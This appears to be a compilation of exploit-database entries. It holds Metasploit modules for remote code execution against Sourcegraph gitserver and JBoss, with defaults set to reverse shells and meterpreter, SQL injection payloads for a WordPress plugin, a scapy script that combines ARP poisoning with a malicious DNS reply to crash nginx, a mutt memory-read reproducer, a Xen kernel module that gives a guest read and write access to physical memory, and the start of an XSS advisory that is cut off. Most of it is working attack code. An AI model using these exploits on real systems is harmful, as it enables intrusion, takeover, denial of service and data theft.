<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sourcegraph gitserver sshCommand RCE',<br /> 'Description' => %q{<br /> A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute<br /> arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can<br /> then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a<br /> feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the<br /> commands that are able to be executed through the git exec REST API.<br /> },<br /> 'Author' => [<br /> 'Altelus1', # github PoC<br /> 'Spencer McIntyre' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-23642'],<br /> ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],<br /> ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],<br /> ],<br /> 'DisclosureDate' => '2022-02-18', # Public disclosure<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory<br /> },<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> # when the OS command is executed, it's executed twice which will cause some of the command stagers to<br /> # be corrupt, these two work even for larger payloads because they're downloaded in a single command<br /> 'CmdStagerFlavor' => %w[curl wget],<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> },<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 3178<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])<br /> return CheckCode::Unknown unless res<br /><br /> if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/<br /> # this is the response if the target repo does exist, highly unlikely since it's randomized<br /> return CheckCode::Vulnerable('Successfully set core.sshCommand.')<br /> elsif res.code == 404 && res.body =~ /"cloneInProgress"/<br /> # this is the response if the target repo does not exist<br /> return CheckCode::Vulnerable<br /> elsif res.code == 400 && res.body =~ /^invalid command/<br /> # this is the response when the server is patched, regardless of if there are cloned repos<br /> return CheckCode::Safe<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> if datastore['EXISTING_REPO'].blank?<br /> @git_repo = send_request_list.sample<br /> fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo<br /><br /> print_status("Using automatically identified repository: #{@git_repo}")<br /> else<br /> @git_repo = datastore['EXISTING_REPO']<br /> end<br /><br /> print_status("Executing #{target.name} target")<br /><br /> @git_origin = Rex::Text.rand_text_alphanumeric(4..11)<br /> git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"<br /> vprint_status("Using #{@git_origin} as a fake git origin")<br /> send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])<br /><br /> case target['Type']<br /> when :unix_memory<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def cleanup<br /> return unless @git_repo && @git_origin<br /><br /> vprint_status('Cleaning up the git changes...')<br /> # delete the remote that was created<br /> send_request_exec(@git_repo, ['remote', 'remove', @git_origin])<br /> # unset the core.sshCommand value<br /> send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])<br /> ensure<br /> super<br /> end<br /><br /> def send_request_exec(repo, args, timeout = 20)<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'exec'),<br /> 'method' => 'POST',<br /> 'data' => {<br /> 'Repo' => repo,<br /> 'Args' => args<br /> }.to_json<br /> }, timeout)<br /> end<br /><br /> def send_request_list<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'list'),<br /> 'method' => 'GET',<br /> 'vars_get' => { 'cloned' => 'true' }<br /> })<br /> fail_with(Failure::Unreachable, 'No server response.') unless res<br /> fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)<br /><br /> res.get_json_document<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])<br /> fail_with(Failure::Unreachable, 'No server response.') unless res<br /> unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/<br /> if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false<br /> fail_with(Failure::BadConfig, 'The specified repository has not been cloned.')<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')<br /> end<br /><br /> send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::JavaDeserialization<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'JBOSS EAP/AS Remoting Unified Invoker RCE',<br /> 'Description' => %q{<br /> An unauthenticated attacker with network access to the JBOSS<br /> EAP/AS <= 6.x Remoting Unified Invoker interface can send a<br /> serialized object to the interface to execute code on vulnerable hosts.<br /> },<br /> 'Author' => [<br /> 'Joao Matos <@joaomatosf>', # Discovery<br /> 'Marcio Almeida <@marcioalm>', # PoC<br /> 'Heyder Andrade <@HeyderAndrade>' # msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf']<br /> ],<br /> 'DisclosureDate' => '2019-12-11',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> Opt::RPORT(4446)<br /> ])<br /> end<br /><br /> def handshake_data<br /> # MAGIC BYTES JAVA SERIALIZATION OBJECT HEADER<br /> # AC ED: STREAM_MAGIC. Specifies that this is a serialization protocol.<br /> # 00 05: STREAM_VERSION. The serialization version.<br /> ['aced0005'].pack('H*')<br /> end<br /><br /> def check<br /> connect<br /> sock.put(handshake_data)<br /> data = sock.get_once(16)<br /> disconnect<br /> return Exploit::CheckCode::Appears if data == handshake_data<br /><br /> return Exploit::CheckCode::Safe<br /> rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e<br /> print_error("Error to connect #{rhost}:#{rport} : '#{e.class}' '#{e}'")<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> # def exploit<br /> def execute_command(cmd, _opts = {})<br /> java_payload = generate_java_deserialization_for_command('CommonsCollections5', 'bash', cmd)<br /> # MAGIC BYTES JBOSS PROTOCOL:<br /> # 0x77: TC_BLOCKDATA<br /> # 0x01: Length of TC_BLOCKDATA<br /> # 0x16: Protocol version 22<br /> # 0x79: TC_RESET<br /> magic_bytes = ['77011679'].pack('H*')<br /> payload = magic_bytes + java_payload.byteslice(4..)<br /> connect<br /> sock.put(handshake_data)<br /> sock.get_once(16)<br /> sock.put(payload)<br /> disconnect<br /> print_good('Successfully sent payload')<br /> rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e<br /> fail_with(Failure::Unreachable, e.message)<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>## Title: WordPress 6.0 - Visual Slide Box Builder 3.2.9 SQLi<br />## Author: nu11secur1ty<br />## Date: 07.11.2022<br />## Vendor: https://wphive.com/<br />## Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin<br /><br /><br /><br />## Description:<br />The parameter `idx` from the Visual Slide Box Builder plugin app for<br />WordPress appears to be vulnerable to SQLi.<br />The attacker can receive all database information from the WordPress<br />database and he can use it for very malicious purposes.<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: idx (GET)<br /> Type: boolean-based blind<br /> Title: HAVING boolean-based blind - WHERE, GROUP BY clause<br /> Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)<br />HAVING 1854=1854<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)<br />AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT<br />NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/jlp5sx)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)<br /># Date: 2022-6-29<br /># Exploit Author: Mohammed Alshehri - https://Github.com/M507<br /># Vendor Homepage: https://nginx.org/<br /># Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0<br /># Version: 0.6.18 - 1.20.0<br /># Tested on: Ubuntu 18.04.4 LTS bionic <br /># CVE: CVE-2021-23017<br /># The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn<br /># python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1<br /># The service needs to be configured to use Nginx resolver<br /><br />from scapy.all import *<br />from multiprocessing import Process<br />from binascii import hexlify, unhexlify<br />import argparse, time, os<br /><br />def device_setup():<br /> os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")<br /> os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")<br /><br />def ARPP(target, dns_server):<br /> print("[*] Sending poisoned ARP packets")<br /> target_mac = getmacbyip(target)<br /> dns_server_mac = getmacbyip(dns_server)<br /> while True:<br /> time.sleep(2)<br /> send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)<br /> send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)<br /><br />def exploit(target):<br /> print("[*] Listening ")<br /> sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)<br /><br />"""<br />RFC schema<br /> 0 1 2 3<br /> 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| LENGTH | ID |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| ANCOUNT | NSCOUNT |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| ARCOUNT | QD |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| AN | NS |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| AR |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br /><br />Fig. DNS <br /><br />"""<br />def process_received_packet(received_packet):<br /> if received_packet[IP].src == target_ip:<br /> if received_packet.haslayer(DNS):<br /> if DNSQR in received_packet:<br /> print("[*] the received packet: " + str(bytes_hex(received_packet)))<br /> print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))<br /> try:<br /> # \/ the received DNS request<br /> dns_request = received_packet[DNS].build()<br /> null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)<br /> print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))<br /> print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))<br /> payload = [<br /> dns_request[0:2],<br /> b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",<br /> dns_request[12:null_pointer_index+1],<br /> dns_request[null_pointer_index+1:null_pointer_index+3],<br /> dns_request[null_pointer_index+3:null_pointer_index+5],<br /> b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",<br /> b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",<br /> b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",<br /> b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"<br /> ]<br /> <br /> payload = b"".join(payload)<br /> spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\<br /> UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\<br /> payload)<br /> print("[+] dns answer: "+str(hexlify(payload)))<br /> print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))<br /><br /> sendp(spoofed_pkt, count=1)<br /> print("\n[+] malicious answer was sent")<br /> print("[+] exploited\n")<br /> except:<br /> print("\n[-] ERROR")<br /><br />def main():<br /> global target_ip<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument("-t", "--target", help="IP address of the target")<br /> parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")<br /> args = parser.parse_args()<br /> target_ip = args.target<br /> dns_server_ip = args.dns_server<br /> device_setup()<br /> processes_list = []<br /> ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))<br /> exploitProcess = Process(target=exploit,args=(target_ip,))<br /> processes_list.append(ARPPProcess)<br /> processes_list.append(exploitProcess)<br /> for process in processes_list:<br /> process.start()<br /> for process in processes_list:<br /> process.join()<br /><br />if __name__ == '__main__':<br /> target_ip = ""<br /> main()<br /> <br /><br /></code></pre>
<pre><code>mutt: mutt_decode_uuencoded() can read the past the of the input line<br /><br />In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replys, for example fragments of other messages, passphrases or keys.<br /><br />Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message.<br /><br />From taviso Thu Mar 31 16:53:55 2022<br />From: taviso<br />Subject: mutt_decode_uuencoded test<br />Content-Disposition: inline<br />Content-Transfer-Encoding: x-uuencode<br />Content-Type: text/plain<br /><br />begin 644 test<br /><9f><br />M2&5L;&\\L\"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU<br />M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*\"@H*<br /><9f><br />54&QE87-E(')E<&QY+`I4879I<RX*<br />`<br />end.<br /><br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is YYYY-MM-DD.<br /><br /><br />Related CVE Numbers: CVE-2022-1328.<br /><br /><br /><br />Found by: taviso@google.com<br /><br /></code></pre>
<pre><code>Xen: PV guest on non-SELFSNOOP CPUs can validate non-coherent L2 pagetable<br /><br />[I'm not sure whether there are any major users of (unshimmed) Xen PV left, but https://xenbits.xen.org/docs/unstable/support-matrix.html says it's still a security-supported usecase for 64-bit guests.]<br /><br />[Tested on Debian's Xen version 4.14.4-pre (Debian 4.14.3+32-g9de3671772-1~deb11u1)]<br /><br />On CPUs without SELFSNOOP support (which I think essentially means \"AMD CPUs\" nowadays?), a Xen PV domain that has access to a PCI device (which grants the domain the ability to set arbitrary cache attributes on all its pages) can trick Xen into validating an L2 pagetable that contains a cacheline that is marked as clean in the cache but actually differs from main memory. After the pagetable has been validated, an attacker can flush the \"clean\" cacheline, such that on the next load, unvalidated data from main memory shows up in the pagetable.<br /><br />The L2 pagetable validation path (promote_l2_table()) can be attacked with this because for zeroed PTEs, it only reads and doesn't write. The L1 pagetable validation path (promote_l1_table()) seems to always write to memory in the C code, but the compiler could conceivably elide that write, making the attack possible against that path, too - I haven't checked what compilers actually do there. Thinking further, it might also be a good idea to check the Memory Sharing code, although that isn't security-supported anyway.<br /><br />(The same attack might also be possible without a PCI device if an HVM/PVH domain is collaborating with the PV domain - from what I can tell, HVM/PVH can always control their cache attributes, and pages with incoherent cache state could then be freed to Xen's page allocator and reallocated by the PV domain, unless opt_scrub_domheap is set?)<br /><br />I made a little reproducer that can be loaded as a kernel module inside a PV guest with PCI passthrough. It gives you a new device /dev/physical_memory using which you can just read and write all physical memory. For example, you can scan around for interesting strings:<br /><br /><br />root@pv-guest:~/incoherent_page_table# strings -20 -td /dev/physical_memory<br />[...]<br />146006071 auth requisite pam_nologin.so<br />146006107 # Load environment from /etc/environment and ~/.pam_environment<br />146006171 session required pam_env.so readenv=1<br />146006214 session required pam_env.so readenv=1 envfile=/etc/default/locale<br />146006286 @include common-auth<br />146006308 -auth optional pam_gnome_keyring.so<br />146006346 @include common-account<br /><br /><br />Looking at that closer, we can dump the whole page and see that it looks like a pagecache page of a PAM config file from dom0:<br /><br /><br />root@pv-guest:~/incoherent_page_table# dd if=/dev/physical_memory bs=1 count=4096 skip=146006016<br />#%PAM-1.0<br /><br /># Block login if they are globally disabled<br />auth requisite pam_nologin.so<br />[...]<br /><br /><br />Then we can clobber it by just dd'ing into it:<br /><br /><br />root@pv-guest:~/incoherent_page_table# echo -n '##CLOBBER##' | dd of=/dev/physical_memory bs=1 seek=146006046<br />11+0 records in<br />11+0 records out<br />11 bytes copied, 0.00109982 s, 10.0 kB/s<br />root@pv-guest:~/incoherent_page_table# <br /><br /><br />And checking from a dom0 shell, the file contents of this config file in dom0 have indeed changed:<br /><br /><br />root@jannh-amdbox:/home/user# head -n5 /etc/pam.d/lightdm<br />#%PAM-1.0<br /><br /># Block login if th##CLOBBER##ally disabled<br />auth requisite pam_nologin.so<br /><br />root@jannh-amdbox:/home/user# <br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2022-06-06.<br /><br /><br /><br /><br /><br />====== Reproducer code ======<br />root@pv-guest:~/incoherent_page_table# cat incoherent_page_table.c<br />#include <linux/module.h><br />#include <linux/kernel.h><br />#include <linux/vmalloc.h><br />#include <linux/set_memory.h><br />#include <linux/mm.h><br />#include <linux/miscdevice.h><br />#include <asm/cacheflush.h><br />#include <asm/tlbflush.h><br />#include <asm/io.h><br />#include <asm/xen/hypercall.h><br />#include <asm/xen/page.h><br /><br />/* first entry in the last L3 pagetable */<br />#define MAPPING_TARGET_ADDR 0xffffff8000000000UL<br /><br />static unsigned long *controlled_l1_pte;<br /><br />static void __tlb_flush_everything_local(void *info)<br />{<br /> __flush_tlb_all();<br />}<br /><br />static void tlb_flush_everything(void)<br />{<br /> on_each_cpu(__tlb_flush_everything_local, NULL, 1);<br />}<br /><br />static ssize_t physmem_rw(char __user *buf, size_t len, loff_t *offp, int is_write)<br />{<br /> ssize_t ret = len;<br /> while (len != 0) {<br /> unsigned long offset_in_page = (*offp) & 0xfff;<br /> size_t chunk_len = min_t(size_t, len, 0x1000 - offset_in_page);<br /> void *mapped_addr = (void*)(MAPPING_TARGET_ADDR + offset_in_page);<br /><br /> pr_warn(\"physmem_rw() iteration: len=%lu, off=%lu, chunk_len=%lu\<br />\", (unsigned long)len, (unsigned long)*offp, (unsigned long)chunk_len);<br /><br /> if (signal_pending(current))<br /> return -ERESTARTSYS;<br /><br /> WRITE_ONCE(*controlled_l1_pte, ((unsigned long)(*offp) & ~0xfffUL) | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER);<br /> tlb_flush_everything();<br /><br /> if (is_write) {<br /> *(volatile char *)mapped_addr = 0; // for debugging<br /> if (copy_from_user(mapped_addr, buf, chunk_len))<br /> ret = -EFAULT;<br /> } else {<br /> *(volatile char *)mapped_addr; // for debugging<br /> if (copy_to_user(buf, mapped_addr, chunk_len))<br /> ret = -EFAULT;<br /> }<br /><br /> WRITE_ONCE(*controlled_l1_pte, 0);<br /> tlb_flush_everything();<br /><br /> buf += chunk_len;<br /> len -= chunk_len;<br /> (*offp) += chunk_len;<br /> }<br /> return ret;<br />}<br /><br />static ssize_t physmem_read(struct file *file, char __user *buf, size_t len, loff_t *offp)<br />{<br /> return physmem_rw(buf, len, offp, 0);<br />}<br /><br />static ssize_t physmem_write(struct file *file, const char __user *buf, size_t len, loff_t *offp)<br />{<br /> return physmem_rw((char __user *)buf, len, offp, 1);<br />}<br /><br />static loff_t my_llseek(struct file *file, loff_t offset, int whence) {<br /> switch (whence) {<br /> case SEEK_CUR:<br /> offset += file->f_pos;<br /> fallthrough;<br /> case SEEK_SET:<br /> file->f_pos = offset;<br /> return file->f_pos;<br /> default:<br /> return -EINVAL;<br /> }<br />}<br /><br />static const struct file_operations physmem_fops = {<br /> .owner = THIS_MODULE,<br /> .read = physmem_read,<br /> .write = physmem_write,<br /> .llseek = my_llseek<br />};<br /><br />static struct miscdevice physmem_miscdev = {<br /> .minor = MISC_DYNAMIC_MINOR,<br /> .name = \"physical_memory\",<br /> .fops = &physmem_fops<br />};<br /><br />static struct page *incoherent_page;<br /><br />static int init_test(void) {<br /> struct page *bogo_l1_page_table;<br /> void *wc_mapping;<br /> pte_t *linear_mapping_ptep;<br /> int level;<br /> pgd_t *pgd = pgd_offset(current->mm, MAPPING_TARGET_ADDR);<br /> p4d_t *p4d = p4d_offset(pgd, MAPPING_TARGET_ADDR);<br /> pud_t *pud = pud_offset(p4d, MAPPING_TARGET_ADDR);<br /> int update_res;<br /> struct mmu_update mmu_update_req;<br /><br /> pr_warn(\"starting incoherent_page_table test\<br />\");<br /> pr_warn(\"old pud: 0x%lx\<br />\", *(unsigned long *)pud);<br /> if (*(unsigned long *)pud != 0) {<br /> pr_warn(\"refusing to clobber existing pte\<br />\");<br /> return -EBUSY;<br /> }<br /><br /> /* allocate a zeroed page, and create a WC mapping of it in vmalloc space */<br /> incoherent_page = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL);<br /> wc_mapping = vmap(&incoherent_page, 1, 0, pgprot_writecombine(PAGE_KERNEL));<br /> if (!wc_mapping) {<br /> pr_warn(\"vmap() failed\<br />\");<br /> return -EFAULT;<br /> }<br /><br /> /* allocate a zeroed L1 pagetable (but don't tell Xen we're going to use it<br /> * that way)<br /> */<br /> bogo_l1_page_table = alloc_page(GFP_KERNEL | __GFP_ZERO | __GFP_NOFAIL);<br /> controlled_l1_pte = page_address(bogo_l1_page_table);<br /><br /> /* reset Xen's internal mapping of the page to normal */<br /> set_pages_uc(incoherent_page, 1);<br /> set_pages_wb(incoherent_page, 1);<br /><br /> /* make sure the page's first line is cached but not dirty */<br /> clflush_cache_range(page_address(incoherent_page), PAGE_SIZE);<br /> *(volatile char *)page_address(incoherent_page);<br /> mb();<br /><br /> /* THIS IS WHERE THE MAGIC HAPPENS:<br /> * sneak past the cache and put a PTE in the page<br /> */<br /> *(pmd_t*)wc_mapping = __pmd((virt_to_machine(controlled_l1_pte).maddr | _PAGE_TABLE));<br /> mb();<br /><br /> /* get rid of all our writable mappings */<br /> vunmap(wc_mapping);<br /> linear_mapping_ptep = lookup_address((unsigned long)page_address(incoherent_page), &level);<br /> if (level != PG_LEVEL_4K) {<br /> pr_warn(\"level != PG_LEVEL_4K\<br />\");<br /> return -EFAULT;<br /> }<br /> set_pte(linear_mapping_ptep, pte_wrprotect(*linear_mapping_ptep));<br /><br /> /* Let Xen validate the incoherently clean cache contents.<br /> * We rely on Xen only *reading* the entries for validating them, not writing<br /> * them back.<br /> * Don't use set_pud() here because we want to see the return value.<br /> */<br /> mmu_update_req.ptr = virt_to_machine(pud).maddr | MMU_NORMAL_PT_UPDATE;<br /> mmu_update_req.val = virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_TABLE;<br /> update_res = HYPERVISOR_mmu_update(&mmu_update_req, 1, NULL, DOMID_SELF);<br /><br /> pr_warn(\"load 1: 0x%lx\<br />\", *(unsigned long *)page_address(incoherent_page));<br /> clflush_cache_range(page_address(incoherent_page), PAGE_SIZE);<br /> pr_warn(\"load 2: 0x%lx\<br />\", *(unsigned long *)page_address(incoherent_page));<br /><br /> pr_warn(\"mmu_update returned %d\<br />\", update_res);<br /> if (update_res < 0)<br /> return -EUCLEAN;<br /><br /> if (misc_register(&physmem_miscdev)) {<br /> pr_warn(\"misc_register failed\<br />\");<br /> return -EFAULT;<br /> }<br /><br /> pr_warn(\"enjoy your physical memory read/write!\<br />\");<br /> pr_warn(\"controlled_l1_pte = 0x%lx\<br />\", (unsigned long)controlled_l1_pte);<br /> return 0;<br />}<br /><br />static void exit_test(void) {<br /> misc_deregister(&physmem_miscdev);<br /> WRITE_ONCE(*controlled_l1_pte, virt_to_machine(page_address(incoherent_page)).maddr | _PAGE_PRESENT | _PAGE_RW | _PAGE_USER);<br /> tlb_flush_everything();<br /> *(unsigned long *)(MAPPING_TARGET_ADDR) = 0;<br /> tlb_flush_everything();<br />}<br /><br />module_init(init_test);<br />module_exit(exit_test);<br />MODULE_LICENSE(\"GPL v2\");<br />root@pv-guest:~/incoherent_page_table# cat Makefile<br />KDIR ?= /lib/modules/`uname -r`/build<br /><br />default:<br /> $(MAKE) -C $(KDIR) M=$$PWD<br />root@pv-guest:~/incoherent_page_table# <br /><br />Related CVE Numbers: CVE-2022-26364.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>EQS Integrity Line: Multiple Vulnerabilities<br /><br /> Name Multiple Vulnerabilities in EQS Integrity Line<br /> Systems Affected EQS Integrity Line through 2022-07-01<br /> Severity High<br /> Impact (CVSSv2) High 8.8/10, score: (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)<br /> Vendor EQS Group AG (https://www.eqs.com/)<br /> Advisory http://www.ush.it/team/ush/advisory-eqs-integrity-line/eqs_integrity_line.txt<br /> Authors Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it)<br /> Date 20220706<br /><br />I. BACKGROUND<br /><br />EQS Integrity Line is a proprietary whistleblowing software which enables<br />employees to report misconduct such as corruption, abuses of power and<br />discrimination internally before complaints become public and, in serious<br />cases, result in financial losses as well as reputational damage.<br /><br />II. DESCRIPTION<br /><br />Multiple Vulnerabilities exist in EQS Integrity Line software.<br /><br />The present advisory highlights two distinct vulnerabilities, namely (A)<br />XSS Vulnerability (stored) [CVE-2022-34007] and (B) Use of GET Request<br />Method With Sensitive Query Strings [CWE-598].<br /><br />III. ANALYSIS<br /><br />A) XSS Vulnerability (stored) [CVE-2022-34007]<br /><br />EQS Integrity Line through 2022-07-01 allows a stored XSS via a crafted<br />whistleblower entry.<br /><br />In order to exploit this vulnerability no account is required on the<br />whistleblowing software.<br /><br />The vulnerability resides in the 